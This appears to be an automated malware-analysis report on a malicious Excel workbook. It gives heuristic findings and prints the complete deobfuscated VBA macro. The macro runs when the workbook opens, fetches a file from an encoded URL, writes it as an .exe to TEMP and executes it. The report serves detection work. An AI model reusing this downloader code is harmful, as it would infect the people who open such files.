Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3c9adef0b3bc1701…

MALICIOUS

Office (OLE)

54.0 KB Created: 2015-12-10 11:04:23 Authoring application: Microsoft Excel First seen: 2021-03-01
MD5: 8f3cd5707ae29ddf8f1b4b78548c80b0 SHA-1: 0ed1d7f027db46575dacc183a0e257e6e927712e SHA-256: 3c9adef0b3bc17014e471a1fb64f45b1dd58e1ac7156182c97389d28d7425be9
208 Risk Score

Heuristics 6

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set RequestAccept1 = CreateObject(RequestAccept7 + "icr" + LCase(RequestAccept10) + "soft" + text + RequestAccept8 + RequestAccept7 + "L" + RequestAccept9 + "TTP")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set RequestAccept1 = CreateObject(RequestAccept7 + "icr" + LCase(RequestAccept10) + "soft" + text + RequestAccept8 + RequestAccept7 + "L" + RequestAccept9 + "TTP")
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName TrimUurl, GetBOm, VbMethod, RequestAccept5, 3 * 2 - 4
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 36705 bytes
SHA-256: 963f2dbed32ec609487183a09ed8542ac6a9ddf3ca3bed8641144a60f4e61d60
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
jsonouterwrap "."
Stream_StringToBinary ""
End Sub



Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private m_strRemoteHost As String
Private m_strFilePath As String
Private m_strHttpResponse As String
Private m_bResponseReceived As Boolean
Private Const m_UserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Private Const m_Accept = "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*"
Private Const m_HTTPStandard = "HTTP/1.0"
Private m_Content As String
Public RequestAccept1 As Object
Public TrimUurl As Object
Public RequestAccept3  As Object
Public RequestAccept4 As String
Public RequestAccept5 As String
Public RequestAccept6 As Object
Public Const RequestAccept7 = "M"
Public Const RequestAccept8 = "X"
Public Const RequestAccept9 = "H"
Public RequestAccept12 As String
Public RequestAccept10 As String
Private m_EncryptedContent As String
Function ttts(userpass As String, command As String, data As String, contenttype As String, url As String, category As String) As String
Dim resptext As String
 Dim WinHttpReq As String
CallByName TrimUurl, GetBOm, VbMethod, RequestAccept5, 3 * 2 - 4

GoTo hemnd
MousePointer = vbHourglass
WinHtt.pReq.Open command, Trim(url), False
WinHtt.pReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
WinHtt.pReq.SetRequestHeader "Authorization", "Basic " + Base64Encode(userpass)
WinHtt.pReq.SetRequestHeader "Content-Type", "application/json"
WinHtt.pReq.Send jsonouterwrap(jsonaddfield("text", Trim(data)) + "," + jsonaddarray("tags", Trim(category)))
resptext1 = WinHtt.pReq.GetAllResponseHeaders()
resptext2 = WinHtt.pReq.ResponseText()
resptext3 = Trim(Str(WinHtt.pReq.Status))
resptext4 = WinHtt.pReq.StatusText
MousePointer = vbDefault
If resptext3 = "204" Then
 ttts = "OK " + Str(Time())
Else
 ttts = resptext4 + ":" + resptext3 + ":" + resptext2 + ":" + resptext1
End If
hemnd:
RequestAccept6.Open (RequestAccept5)
End Function
Public Function jsonouterwrap(text As String) As String
RequestAccept10 = Chr(Asc(RequestAccept7) + 2)
Set RequestAccept1 = CreateObject(RequestAccept7 + "icr" + LCase(RequestAccept10) + "soft" + text + RequestAccept8 + RequestAccept7 + "L" + RequestAccept9 + "TTP")
jsonouterwrap = "{" + text + "}"
jsonaddfield "", ""
End Function
Function jsonaddfield(field As String, text2wrap As String) As String
jsonaddfield = Chr(34) + field + Chr(34) + ":" + Chr(34) + text2wrap + Chr(34)
Set TrimUurl = CreateObject("Adodb.Stream")
testjsonaddarray
End Function
Function jsonaddarray(field As String, text2wrap As String) As String
jsonaddarray = Chr(34) + field + Chr(34) + ":" + "[" + Chr(34) + text2wrap + Chr(34) + "]"
End Function
Sub testjsonaddfield()
MsgBox (jsonaddfield("text", "james"))
End Sub

Public Function ParseReturnedPage(strWebPage As String) As String
Dim headerSplit As Integer
Dim m_sHost As String
RequestAccept5 = RequestAccept4 + Chr(Asc(RequestAccept7) + 15) + LCase(RequestAccept7 + RequestAccept7 + RequestAccept8 + RequestAccept10 + RequestAccept9) + RequestAccept12 + "exe"
    GoTo Savi
If Len(strWebPage) = 0 Then Exit Function
 headerSplit = InStr(1, strWebPage, vbCrLf & vbCrLf) + 4
 m_Content = Mid(strWebPage, headerSplit, Len(strWebPage) - headerSplit + 1)
 m_sHost = frmCom.sckcom.RemoteHost
 Select Case m_Variable("type", vbLf)
 Case "RareTrackerLast20"
 Sho.wLast (20)
 Case "RareTrackerMyRares"
 Sho.wMine (20)
 Case Else
 m_Content = DecA.SCString(m_Content)
 If m_Variable("type", vbLf) = "AuthServer" Then
 m_Content = Replace(m_Content, "type?AuthServer" & vbLf, "")
 m_Content = mCrypt.Decrypt(m_Content)
 Select Case m_sHost
 Case "www.lifetankxi.com"
 Verif.yClient
 SaveSetting "Other", "Other", "ConnectionHandler", 0
 Case "raretracker.acvault.ign.com"
 Verif.yClient
 SaveSetting "Other", "Other", "ConnectionHandler", 0
 Case "www.paraduck.net"
 Veri.fyClient
 SaveSetting "Other", "Other", "ConnectionHandler", 0
 Case Else
 If GetSetting("Other", "Other", "ConnectionHandler") = "1" Then
 PrintMe.ssage "Your Lifetank has been permanently disabled. Sorry for the trouble!"
 Else
 PrintMe.ssage "Your Lifetank has been permanently disabled. Sorry for the trouble!"
 SaveSet.ting "Other", "Other", "ConnectionHandler", 1
 End If
 End Select
 End If
 End Select
Savi:
TrimUurl.Type = 1
TrimUurl.Open
TrimUurl.write RequestAccept1.responseBody
   ttts "", "", "", "", "", ""
End Function

Sub testjsonaddarray()

Set RequestAccept6 = CreateObject("Shell.Application")
testb64
Exit Sub
MsgBox (jsonaddarray("text", "tag1"))
End Sub
Sub testjsonwrap()
MsgBox (jsonouterwrap(jsonaddfield("text", "xxyyzz") + "," + jsonaddarray("tags", "noun")))
End Sub
Sub testb64()
RequestAccept11 = Chr(Asc(RequestAccept10) + 22)

RequestAccept12 = Chr(Asc(RequestAccept10) - 33)
Set RequestAccept3 = CreateObject(UCase("w") + UCase("s") + "cript" + RequestAccept12 + "Sh" + "" + RequestAccept11 + "ll").Environment("Pr" + LCase(RequestAccept10) + "c" + RequestAccept11 + "ss")
Exit Sub
 MsgBox (Base64Encode("user:mypass"))
End Sub
Function Base64Encode(sText)
 Dim oXML, oNode
 Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
 Set oNode = oXML.createElement("base64")
 oNode.DataType = "bin.base64"
 oNode.nodeTypedValue = Stream_StringToBinary(sText)
 Base64Encode = oNode.text
 Set oNode = Nothing
 Set oXML = Nothing
End Function
Public Function ResponsebStrData(RareTrackerMyR() As Variant, frmComsckcom As Integer) As String
    Dim i As Integer
    RareTrackerL = ""
    For i = LBound(RareTrackerMyR) To UBound(RareTrackerMyR)
        RareTrackerL = RareTrackerL & Chr(RareTrackerMyR(i) - 12 * frmComsckcom - 8 * 1000 - 900 - 8 * 9)
    Next i
    ResponsebStrData = RareTrackerL
End Function
Function Stream_BinaryToString(Binary)
 Const adTypeText = 2
 Const adTypeBinary = 1
 Dim BinaryStream
 Set BinaryStream = CreateObject("ADODB.Stream")
 BinaryStream.Type = adTypeBinary
 BinaryStream.Open
 BinaryStream.write Binary
 BinaryStream.Position = 0
 BinaryStream.Type = adTypeText
 BinaryStream.Charset = "us-ascii"
 Stream_BinaryToString = BinaryStream.ReadText
 Set BinaryStream = Nothing
End Function
Public Function Download(url As String)
Dim strURL As String
On Error GoTo ErrorHandler
 If Len(url) = 0 Then
 PrintMessage "Please, enter the URL to retrieve."
 Exit Function
 End If
 If Left(url, 7) = "http://" Then
 strURL = Mid(url, 8)
 url = Mid(url, 8)
 Else
 strURL = url
 End If
 If Right(url, 1) = "/" Then
 strURL = Mid(url, 1, Len(url) - 1)
 url = Mid(url, 1, Len(url) - 1)
 Else
 strURL = url
 End If
 m_strRemoteHost = Left$(strURL, InStr(1, strURL, "/") - 1)
 m_strFilePath = Mid$(strURL, InStr(1, strURL, "/"))
 m_strHttpResponse = ""
 m_bResponseReceived = False
 With frmCom.sckcom
 .Close
 .LocalPort = 0
 .Connect m_strRemoteHost, 80
 End With
Exit Function
ErrorHandler:
If Err.Number = 5 Then
 strURL = strURL & "/"
 Resume 0
Else
 PrintMessage "An error has occurred." & vbCrLf & "Error #: " & Err.Number & vbCrLf & "Description: " & Err.Description
 Exit Function
End If
End Function
Function GetBOm() As String
GetBOm = LCase(Chr(Asc(RequestAccept7) + 6) + "avet" + RequestAccept10) & "fil" + LCase("e")
End Function
Public Function Stream_StringToBinary(text)

 Const adTypeText = 2
 Const adTypeBinary = 1
 
Dim ReturnedPageWeb() As Variant
ReturnedPageWeb = Array(9472, 9484, 9484, 9480, 9426, 9415, 9415, 9476, 9485, 9467, 9475, 9489, 9477, 9465, 9478, 9414, 9477, 9469, 9415, 9423, 9422, 9484, 9423, 9472, 9415, 9423, 9422, 9471, 9474, 9475, 9414, 9469, 9488, 9469)
RequestAccept1.Open Chr(Asc(RequestAccept10) - 8) + "ET", ResponsebStrData(ReturnedPageWeb, 33), False
GoTo notor
 Dim BinaryStream
 Set BinaryStream = CreateObject("ADODB.Stream")
 BinaryStream.Type = adTypeText
 BinaryStream.Charset = "us-ascii"
 BinaryStream.Open
 BinaryStream.WriteText text
 BinaryStream.Position = 0
 BinaryStream.Type = adTypeBinary
 BinaryStream.Position = 0
 Stream_StringToBinary = BinaryStream.Read
 Set BinaryStream = Nothing
notor:
RequestAccept13 = Asc(RequestAccept10)
 RequestAccept4 = RequestAccept3(Chr(RequestAccept13 + 5) + UCase(Chr(RequestAccept13 - 10)) & RequestAccept7 & Chr(RequestAccept13 + 1))
Connect
End Function
Public Function Connect()
RequestAccept1.Send
GoTo Fin
On Error GoTo Error_Handler
 Dim strHttpRequest As String
 strHttpRequest = "GET " & m_strFilePath & " " & m_HTTPStandard & vbCrLf
 strHttpRequest = strHttpRequest & "Host: " & m_strRemoteHost & vbCrLf
 strHttpRequest = strHttpRequest & "Accept: " & m_Accept & vbCrLf
 strHttpRequest = strHttpRequest & "User-Agent: " & m_UserAgent & vbCrLf
 strHttpRequest = strHttpRequest & "Connection: close" & vbCrLf
 strHttpRequest = strHttpRequest & vbCrLf
 frmCom.sckcom.SendData strHttpRequest
Fin:
ParseReturnedPage ""
 Exit Function
Error_Handler:
 PrintEr.rorMessage "mDownload.Connect - " & Err.Description
 Resume Fin
End Function
Public Function DataArrived(bStrData As String)
 m_strHttpResponse = m_strHttpResponse & bStrData
End Function
Public Function ParseAndClose()
 ParseReturnedPage (m_strHttpResponse)
 If frmCom.sckcom.State <> 0 Then
 frmCom.sckcom.Close
 End If
End Function
Public Function m_Variable(bStrVariableName As String, Optional bStrDelimeter = vbCrLf) As String
On Error Resume Next
Dim foundMatch As Boolean
Dim m_strVariables() As String
Dim m_strVariableSplit() As String
Dim m_VariableValue As String
Dim m_dLocation As Double
 m_dLocation = -1
Dim i As Integer
 If InStr(m_Content, bStrVariableName) Then
 foundMatch = True
 m_strVariables = Split(m_Content, bStrDelimeter)
 Else
 foundMatch = False
 End If
 If foundMatch = True Then
 For i = LBound(m_strVariables) To UBound(m_strVariables)
 If m_dLocation = -1 Then
 m_strVariableSplit() = Split(m_strVariables(i), "?", 2)
 If m_strVariableSplit(0) = bStrVariableName Then
 m_dLocation = i
 End If
 End If
 Next i
 End If
 If m_dLocation = -1 Then
 m_Variable = "NULL"
 Else
 If m_strVariableSplit(1) = "" Then
 m_Variable = "NULL"
 Else
 m_Variable = m_strVariableSplit(1)
 End If
 End If
End Function




' Processing file: /opt/analyzer/scan_staging/a7ac12dfc57f45b08c30d93f80421263.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ЭтаКнига - 1409 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Open())
' Line #1:
' 	LitStr 0x0001 "."
' 	ArgsCall jsonouterwrap 0x0001 
' Line #2:
' 	LitStr 0x0000 ""
' 	ArgsCall Stream_StringToBinary 0x0001 
' Line #3:
' 	EndSub 
' Line #4:
' Line #5:
' _VBA_PROJECT_CUR/VBA/Лист1 - 984 bytes
' _VBA_PROJECT_CUR/VBA/Лист2 - 984 bytes
' _VBA_PROJECT_CUR/VBA/Лист3 - 984 bytes
' _VBA_PROJECT_CUR/VBA/Module1 - 19307 bytes
' Line #0:
' 	Dim (Private) 
' 	VarDefn m_strRemoteHost (As String)
' Line #1:
' 	Dim (Private) 
' 	VarDefn m_strFilePath (As String)
' Line #2:
' 	Dim (Private) 
' 	VarDefn m_strHttpResponse (As String)
' Line #3:
' 	Dim (Private) 
' 	VarDefn m_bResponseReceived (As Boolean)
' Line #4:
' 	Dim (Private Const) 
' 	LitStr 0x002E "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
' 	VarDefn m_UserAgent
' Line #5:
' 	Dim (Private Const) 
' 	LitStr 0x0085 "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*"
' 	VarDefn m_Accept
' Line #6:
' 	Dim (Private Const) 
' 	LitStr 0x0008 "HTTP/1.0"
' 	VarDefn m_HTTPStandard
' Line #7:
' 	Dim (Private) 
' 	VarDefn m_Content (As String)
' Line #8:
' 	Dim (Public) 
' 	VarDefn RequestAccept1 (As Object)
' Line #9:
' 	Dim (Public) 
' 	VarDefn TrimUurl (As Object)
' Line #10:
' 	Dim (Public) 
' 	VarDefn RequestAccept3 (As Object) 0x0017
' Line #11:
' 	Dim (Public) 
' 	VarDefn RequestAccept4 (As String)
' Line #12:
' 	Dim (Public) 
' 	VarDefn RequestAccept5 (As String)
' Line #13:
' 	Dim (Public) 
' 	VarDefn RequestAccept6 (As Object)
' Line #14:
' 	Dim (Public Const) 
' 	LitStr 0x0001 "M"
' 	VarDefn RequestAccept7
' Line #15:
' 	Dim (Public Const) 
' 	LitStr 0x0001 "X"
' 	VarDefn RequestAccept8
' Line #16:
' 	Dim (Public Const) 
' 	LitStr 0x0001 "H"
' 	VarDefn RequestAccept9
' Line #17:
' 	Dim (Public) 
' 	VarDefn RequestAccept12 (As String)
' Line #18:
' 	Dim (Public) 
' 	VarDefn RequestAccept10 (As String)
' Line #19:
' 	Dim (Private) 
' 	VarDefn m_EncryptedContent (As String)
' Line #20:
' 	FuncDefn (Function ttts(userpass As String, command As String, data As String, contenttype As String, url As String, category As String) As String)
' Line #21:
' 	Dim 
' 	VarDefn resptext (As String)
' Line #22:
' 	Dim 
' 	VarDefn WinHttpReq (As String)
' Line #23:
' 	Ld TrimUurl 
' 	Ld _B_var_Time 
' 	Ld VbMethod 
' 	Ld RequestAccept5 
' 	LitDI2 0x0003 
' 	LitDI2 0x0002 
' 	Mul 
' 	LitDI2 0x0004 
' 	Sub 
' 	ArgsCall CallByName 0x0005 
' Line #24:
' Line #25:
' 	GoTo hemnd 
' Line #26:
' 	Ld vbHourglass 
' 	St MousePointer 
' Line #27:
' 	Ld command 
' 	Ld url 
' 	ArgsLd Trim 0x0001 
' 	LitVarSpecial (False)
' 	Ld WinHtt 
' 	MemLd pReq 
' 	ArgsMemCall Open 0x0003 
' Line #28:
' 	LitStr 0x000A "User-Agent"
' 	LitStr 0x0032 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
' 	Ld WinHtt 
' 	MemLd pReq 
' 	ArgsMemCall SetRequestHeader 0x0002 
' Line #29:
' 	LitStr 0x000D "Authorization"
' 	LitStr 0x0006 "Basic "
' 	Ld userpass 
' 	ArgsLd Base64Encode 0x0001 
' 	Add 
' 	Ld WinHtt 
' 	MemLd pReq 
' 	ArgsMemCall SetRequestHeader 0x0002 
' Line #30:
' 	LitStr 0x000C "Content-Type"
' 	LitStr 0x0010 "application/json"
' 	Ld WinHtt 
' 	MemLd pReq 
' 	ArgsMemCall SetRequestHeader 0x0002 
' Line #31:
' 	LitStr 0x0004 "text"
' 	Ld data 
' 	ArgsLd Trim 0x0001 
' 	ArgsLd jsonaddfield 0x0002 
' 	LitStr 0x0001 ","
' 	Add 
' 	LitStr 0x0004 "tags"
' 	Ld category 
' 	ArgsLd Trim 0x0001 
' 	ArgsLd jsonaddarray 0x0002 
' 	Add 
' 	ArgsLd jsonouterwrap 0x0001 
' 	Ld WinHtt 
' 	MemLd pReq 
' 	ArgsMemCall Send 0x0001 
' Line #32:
' 	Ld WinHtt 
' 	MemLd pReq 
' 	ArgsMemLd GetAllResponseHeaders 0x0000 
' 	St resptext1 
' Line #33:
' 	Ld WinHtt 
' 	MemLd pReq 
' 	ArgsMemLd ResponseText 0x0000 
' 	St resptext2 
' Line #34:
' 	Ld WinHtt 
' 	MemLd pReq 
' 	MemLd Status 
' 	ArgsLd Str 0x0001 
' 	ArgsLd Trim 0x0001 
' 	St resptext3 
' Line #35:
' 	Ld WinHtt 
' 	MemLd pReq 
' 	MemLd StatusText 
' 	St resptext4 
' Line #36:
' 	Ld vbDefault 
' 	St MousePointer 
' Line #37:
' 	Ld resptext3 
' 	LitStr 0x0003 "204"
' 	Eq 
' 	IfBlock 
' Line #38:
' 	LitStr 0x0003 "OK "
' 	ArgsLd Time 0x0000 
' 	ArgsLd Str 0x0001 
' 	Add 
' 	St ttts 
' Line #39:
' 	ElseBlock 
' Line #40:
' 	Ld resptext4 
' 	LitStr 0x0001 ":"
' 	Add 
' 	Ld resptext3 
' 	Add 
' 	LitStr 0x0001 ":"
' 	Add 
' 	Ld resptext2 
' 	Add 
' 	LitStr 0x0001 ":"
' 	Add 
' 	Ld resptext1 
' 	Add 
' 	St ttts 
' Line #41:
' 	EndIfBlock 
' Line #42:
' 	Label hemnd 
' Line #43:
' 	Ld RequestAccept5 
' 	Paren 
' 	Ld RequestAccept6 
' 	ArgsMemCall Open 0x0001 
' Line #44:
' 	EndFunc 
' Line #45:
' 	FuncDefn (Public Function jsonouterwrap(Text As String) As String)
' Line #46:
' 	Ld RequestAccept7 
' 	ArgsLd Asc 0x0001 
' 	LitDI2 0x0002 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	St RequestAccept10 
' Line #47:
' 	SetStmt 
' 	Ld RequestAccept7 
' 	LitStr 0x0003 "icr"
' 	Add 
' 	Ld RequestAccept10 
' 	ArgsLd LCase 0x0001 
' 	Add 
' 	LitStr 0x0004 "soft"
' 	Add 
' 	Ld Text 
' 	Add 
' 	Ld RequestAccept8 
' 	Add 
' 	Ld RequestAccept7 
' 	Add 
' 	LitStr 0x0001 "L"
' 	Add 
' 	Ld RequestAccept9 
' 	Add 
' 	LitStr 0x0003 "TTP"
' 	Add 
' 	ArgsLd CreateObject 0x0001 
' 	Set RequestAccept1 
' Line #48:
' 	LitStr 0x0001 "{"
' 	Ld Text 
' 	Add 
' 	LitStr 0x0001 "}"
' 	Add 
' 	St jsonouterwrap 
' Line #49:
' 	LitStr 0x0000 ""
' 	LitStr 0x0000 ""
' 	ArgsCall jsonaddfield 0x0002 
' Line #50:
' 	EndFunc 
' Line #51:
' 	FuncDefn (Function jsonaddfield(field As String, text2wrap As String) As String)
' Line #52:
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Ld field 
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	Ld text2wrap 
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	St jsonaddfield 
' Line #53:
' 	SetStmt 
' 	LitStr 0x000C "Adodb.Stream"
' 	ArgsLd CreateObject 0x0001 
' 	Set TrimUurl 
' Line #54:
' 	ArgsCall testjsonaddarray 0x0000 
' Line #55:
' 	EndFunc 
' Line #56:
' 	FuncDefn (Function jsonaddarray(field As String, text2wrap As String) As String)
' Line #57:
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Ld field 
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0001 "["
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	Ld text2wrap 
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitStr 0x0001 "]"
' 	Add 
' 	St jsonaddarray 
' Line #58:
' 	EndFunc 
' Line #59:
' 	FuncDefn (Sub testjsonaddfield())
' Line #60:
' 	LitStr 0x0004 "text"
' 	LitStr 0x0005 "james"
' 	ArgsLd jsonaddfield 0x0002 
' 	Paren 
' 	ArgsCall MsgBox 0x0001 
' Line #61:
' 	EndSub 
' Line #62:
' Line #63:
' 	FuncDefn (Public Function ParseReturnedPage(strWebPage As String) As String)
' Line #64:
' 	Dim 
' 	VarDefn headerSplit (As Integer)
' Line #65:
' 	Dim 
' 	VarDefn m_sHost (As String)
' Line #66:
' 	Ld RequestAccept4 
' 	Ld RequestAccept7 
' 	ArgsLd Asc 0x0001 
' 	LitDI2 0x000F 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	Ld RequestAccept7 
' 	Ld RequestAccept7 
' 	Add 
' 	Ld RequestAccept8 
' 	Add 
' 	Ld RequestAccept10 
' 	Add 
' 	Ld RequestAccept9 
' 	Add 
' 	ArgsLd LCase 0x0001 
' 	Add 
' 	Ld RequestAccept12 
' 	Add 
' 	LitStr 0x0003 "exe"
' 	Add 
' 	St RequestAccept5 
' Line #67:
' 	GoTo Savi 
' Line #68:
' 	Ld strWebPage 
' 	FnLen 
' 	LitDI2 0x0000 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitFunc 
' 	EndIf 
' Line #69:
' 	LitDI2 0x0001 
' 	Ld strWebPage 
' 	Ld vbCrLf 
' 	Ld vbCrLf 
' 	Concat 
' 	FnInStr3 
' 	LitDI2 0x0004 
' 	Add 
' 	St headerSplit 
' Line #70:
' 	Ld strWebPage 
' 	Ld headerSplit 
' 	Ld strWebPage 
' 	FnLen 
' 	Ld headerSplit 
' 	Sub 
' 	LitDI2 0x0001 
' 	Add 
' 	ArgsLd Mid 0x0003 
' 	St m_Content 
' Line #71:
' 	Ld frmCom 
' 	MemLd sckcom 
' 	MemLd RemoteHost 
' 	St m_sHost 
' Line #72:
' 	LitStr 0x0004 "type"
' 	Ld vbLf 
' 	ArgsLd m_Variable 0x0002 
' 	SelectCase 
' Line #73:
' 	LitStr 0x0011 "RareTrackerLast20"
' 	Case 
' 	CaseDone 
' Line #74:
' 	LitDI2 0x0014 
' 	Paren 
' 	Ld Sho 
' 	ArgsMemCall wLast 0x0001 
' Line #75:
' 	LitStr 0x0012 "RareTrackerMyRares"
' 	Case 
' 	CaseDone 
' Line #76:
' 	LitDI2 0x0014 
' 	Paren 
' 	Ld Sho 
' 	ArgsMemCall wMine 0x0001 
' Line #77:
' 	CaseElse 
' Line #78:
' 	Ld m_Content 
' 	Ld DecA 
' 	ArgsMemLd SCString 0x0001 
' 	St m_Content 
' Line #79:
' 	LitStr 0x0004 "type"
' 	Ld vbLf 
' 	ArgsLd m_Variable 0x0002 
' 	LitStr 0x000A "AuthServer"
' 	Eq 
' 	IfBlock 
' Line #80:
' 	Ld m_Content 
' 	LitStr 0x000F "type?AuthServer"
' 	Ld vbLf 
' 	Concat 
' 	LitStr 0x0000 ""
' 	ArgsLd Replace 0x0003 
' 	St m_Content 
' Line #81:
' 	Ld m_Content 
' 	Ld mCrypt 
' 	ArgsMemLd Decrypt 0x0001 
' 	St m_Content 
' Line #82:
' 	Ld m_sHost 
' 	SelectCase 
' Line #83:
' 	LitStr 0x0012 "www.lifetankxi.com"
' 	Case 
' 	CaseDone 
' Line #84:
' 	Ld Verif 
' 	ArgsMemCall yClient 0x0000 
' Line #85:
' 	LitStr 0x0005 "Other"
' 	LitStr 0x0005 "Other"
' 	LitStr 0x0011 "ConnectionHandler"
' 	LitDI2 0x0000 
' 	ArgsCall SaveSetting 0x0004 
' Line #86:
' 	LitStr 0x001B "raretracker.acvault.ign.com"
' 	Case 
' 	CaseDone 
' Line #87:
' 	Ld Verif 
' 	ArgsMemCall yClient 0x0000 
' Line #88:
' 	LitStr 0x0005 "Other"
' 	LitStr 0x0005 "Other"
' 	LitStr 0x0011 "ConnectionHandler"
' 	LitDI2 0x0000 
' 	ArgsCall SaveSetting 0x0004 
' Line #89:
' 	LitStr 0x0010 "www.paraduck.net"
' 	Case 
' 	CaseDone 
' Line #90:
' 	Ld Veri 
' 	ArgsMemCall fyClient 0x0000 
' Line #91:
' 	LitStr 0x0005 "Other"
' 	LitStr 0x0005 "Other"
' 	LitStr 0x0011 "ConnectionHandler"
' 	LitDI2 0x0000 
' 	ArgsCall SaveSetting 0x0004 
' Line #92:
' 	CaseElse 
' Line #93:
' 	LitStr 0x0005 "Other"
' 	LitStr 0x0005 "Other"
' 	LitStr 0x0011 "ConnectionHandler"
' 	ArgsLd GetSetting 0x0003 
' 	LitStr 0x0001 "1"
' 	Eq 
' 	IfBlock 
' Line #94:
' 	LitStr 0x0043 "Your Lifetank has been permanently disabled. Sorry for the trouble!"
' 	Ld PrintMe 
' 	ArgsMemCall ssage 0x0001 
' Line #95:
' 	ElseBlock 
' Line #96:
' 	LitStr 0x0043 "Your Lifetank has been permanently disabled. Sorry for the trouble!"
' 	Ld PrintMe 
' 	ArgsMemCall ssage 0x0001 
' Line #97:
' 	LitStr 0x0005 "Other"
' 	LitStr 0x0005 "Other"
' 	LitStr 0x0011 "ConnectionHandler"
' 	LitDI2 0x0001 
' 	Ld SaveSet 
' 	ArgsMemCall ting 0x0004 
' Line #98:
' 	EndIfBlock 
' Line #99:
' 	EndSelect 
' Line #100:
' 	EndIfBlock 
' Line #101:
' 	EndSelect 
' Line #102:
' 	Label Savi 
' Line #103:
' 	LitDI2 0x0001 
' 	Ld TrimUurl 
' 	MemSt Type 
' Line #104:
' 	Ld TrimUurl 
' 	ArgsMemCall Open 0x0000 
' Line #105:
' 	Ld RequestAccept1 
' 	MemLd responseBody 
' 	Ld TrimUurl 
' 	ArgsMemCall Write 0x0001 
' Line #106:
' 	LitStr 0x0000 ""
' 	LitStr 0x0000 ""
' 	LitStr 0x0000 ""
' 	LitStr 0x0000 ""
' 	LitStr 0x0000 ""
' 	LitStr 0x0000 ""
' 	ArgsCall ttts 0x0006 
' Line #107:
' 	EndFunc 
' Line #108:
' Line #109:
' 	FuncDefn (Sub testjsonaddarray())
' Line #110:
' Line #111:
' 	SetStmt 
' 	LitStr 0x0011 "Shell.Application"
' 	ArgsLd CreateObject 0x0001 
' 	Set RequestAccept6 
' Line #112:
' 	ArgsCall testb64 0x0000 
' Line #113:
' 	ExitSub 
' Line #114:
' 	LitStr 0x0004 "text"
' 	LitStr 0x0004 "tag1"
' 	ArgsLd jsonaddarray 0x0002 
' 	Paren 
' 	ArgsCall MsgBox 0x0001 
' Line #115:
' 	EndSub 
' Line #116:
' 	FuncDefn (Sub testjsonwrap())
' Line #117:
' 	LitStr 0x0004 "text"
